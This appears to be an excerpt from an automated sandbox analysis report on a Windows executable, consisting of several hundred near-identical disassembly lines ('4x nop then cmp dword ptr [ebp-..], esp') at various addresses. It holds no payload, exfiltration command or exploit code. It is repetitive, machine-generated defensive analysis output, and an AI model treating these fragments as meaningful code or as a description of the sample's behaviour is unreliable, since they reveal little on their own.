                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_0040421D
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_0044222C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_004A4222
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0040C22C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then add esp, 0Ch0_2_0040C22C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_0040C22C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_004B02C7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_004502FE
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-20h], esp0_2_0049E283
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_004A4297
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004562A0
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_00464345
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_00464345
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0047C367
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0047C367
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0047C367
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0047C367
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0047C367
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0047C367
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0047C367
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0047C367
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0047C367
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0047C367
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0047C367
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0047C367
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004A030F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_0046A30C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_0046A30C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_0043E308
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0040A338
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_0040A338
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0040A338
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0040A338
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0040A338
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_00484331
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_00484331
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_004B63E5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_0041A3F7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_0041A3F7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_0041A3F7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then add esp, 04h0_2_0041A3F7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_004B0399
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_004B0399
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004A23A5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_004A23A5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-40h], esp0_2_004B4458
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-000000A8h], esp0_2_004B4458
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-68h], esp0_2_004B4458
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-40h], esp0_2_004B4458
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-58h], esp0_2_004C445B
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-58h], esp0_2_004C445B
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-3Ch], esp0_2_004C445B
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_00442466
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then add esp, 08h0_2_0047246B
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then add esp, 04h0_2_0047246B
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-20h], esp0_2_0049C406
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_0047E42C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_0047E42C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_0049E4EB
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_00470485
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-38h], esp0_2_004B64B7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426519
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_004AE511
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_004C2521
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_004C2521
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then add esp, 08h0_2_004A8537
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then add esp, 04h0_2_004A8537
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004805F0
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004805F0
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004805F0
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004805F0
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_004145B5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-44h], esp0_2_0044C5BF
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_0044C5BF
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_004AA65D
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_004AA65D
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-20h], esp0_2_0049C606
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0040461E
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_004A0622
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-20h], esp0_2_004AE63F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0043C6C7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_004BE6CD
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then add esp, 04h0_2_004C26C6
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_004806F0
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_004A2691
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_004B6690
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_00470699
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_00442748
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00442748
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_00442748
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_00442748
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_00442748
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_00442748
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_00442748
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_00442748
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_00442748
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00442748
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_0047476F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-48h], esp0_2_0047476F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-44h], esp0_2_0047476F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-44h], esp0_2_0047476F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-44h], esp0_2_0047476F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-44h], esp0_2_0047476F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_0047476F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp0_2_0047476F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-44h], esp0_2_0047476F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_00486718
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_0048A725
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_0048A725
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004567F4
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_004567F4
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004567F4
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004567F4
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004567F4
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_004567F4
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_0043C7F8
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_0043C7F8
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_0049E790
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_0049E790
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-58h], esp0_2_0046C7BF
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-58h], esp0_2_0046C7BF
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-58h], esp0_2_0046C7BF
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_0046C7BF
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_0046C7BF
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004BA852
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_004BA852
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_00490852
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_00470859
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_00478875
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_0040E873
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp0_2_004B880D
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_0046A813
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_0046A813
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp0_2_0049C811
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_0044681D
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_0048E812
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_0048E812
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_0048E812
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_0046483C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_0046483C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_0046483C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_0046483C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_004128D5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_004128D7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_004C88D1
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_004C88D1
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_004C88D1
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_004828FE
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0044695A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_0044695A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_00404964
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp0_2_004C2909
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0046090D
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0046090D
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp0_2_0043C91D
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp0_2_004529CC
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004809EB
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp0_2_004C49E0
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_004269F5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_004269F5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_004269F5
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_004509FE
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_004509FE
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-64h], esp0_2_0044298A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-60h], esp0_2_0044298A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-60h], esp0_2_0044298A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-60h], esp0_2_0044298A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-60h], esp0_2_0044298A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-64h], esp0_2_0044298A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-64h], esp0_2_0044298A
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp0_2_004B2A2D
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_0046AA2F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-58h], esp0_2_0046AA2F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-58h], esp0_2_0046AA2F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_0046AA2F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp0_2_0046AA2F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_00426AD7
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp0_2_00490AEF
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004BCA82
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-20h], esp0_2_0049CAA2
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_0043CB4C
